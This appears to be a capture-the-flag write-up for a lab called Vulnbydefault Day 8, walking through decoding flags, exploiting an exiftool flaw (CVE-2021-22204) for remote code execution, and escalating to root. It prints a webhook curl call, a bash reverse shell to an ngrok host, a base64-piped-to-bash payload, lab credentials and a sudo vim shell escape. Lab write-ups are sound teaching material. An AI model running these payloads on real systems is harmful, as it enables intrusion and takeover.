ChallengeWriteup

Day 8 Challenge Writeups

Cover Image for Day 8 Challenge Writeups
Team
Team

Vulnbydefault Day 8 Writeup

On opening the site url we have given following interface

image.png

lets register a user and login

image.png

we have got following dashboard

image.png

Lets upload a image file

image.png

There is also download button

image.png

Flag 1

Lets check the source of dashboard

image.png

Lets decode it on this site

image.png

Flag 2

Lets check the /robots.txt

image.png

Base64 decode : L2c7c88f0f265FG673b76a5dceA{c74be18597}

Lets check transpostion cipher go this site

image.png

Flag 3

Lets upload file on dashboard

image.png

Lets decode it

image.png

RCE

In exif out of the application we can check the exiftool version

image.png

Let search for this version online

image.png

image.png

Lets use webhook

image.png

Lets check for rce

python3 exploit-CVE-2021-22204.py -c 'curl <webhook-url>'

image.png

Lets upload it on dashboard

we have got request on our webhook

image.png

This confirms that we have rce

Lets use reverse shell payload

bash -c "bash -i >& /dev/tcp/ngrok/port 0>&1

image.png

python3 exploit-CVE-2021-22204.py -c 'echo <base64-encoded-payload> | base64 -d | bash'

image.png

Lets upload again

we have got reverse shell

image.png

image.png

image.png

Flag 4

image.png

image.png

Lets check this developer hash on hashes.com

image.png

Flag 5

Lets use developer password developer:marvelous

image.png

Flag 6

Lets check the mail of developer user

image.png

Lets check for sudo privileges for developer user

image.png

Lets check .bash_history file

image.png

we got password of manager user

user.txt

Lets use the manager user password manager:y0uG0tM3

image.png

root.txt

Lets check the sudo privileges of manager user

image.png

Alright we can use sudo on vim

Use this site

image.png

sudo vim -c ':!/bin/sh'

image.png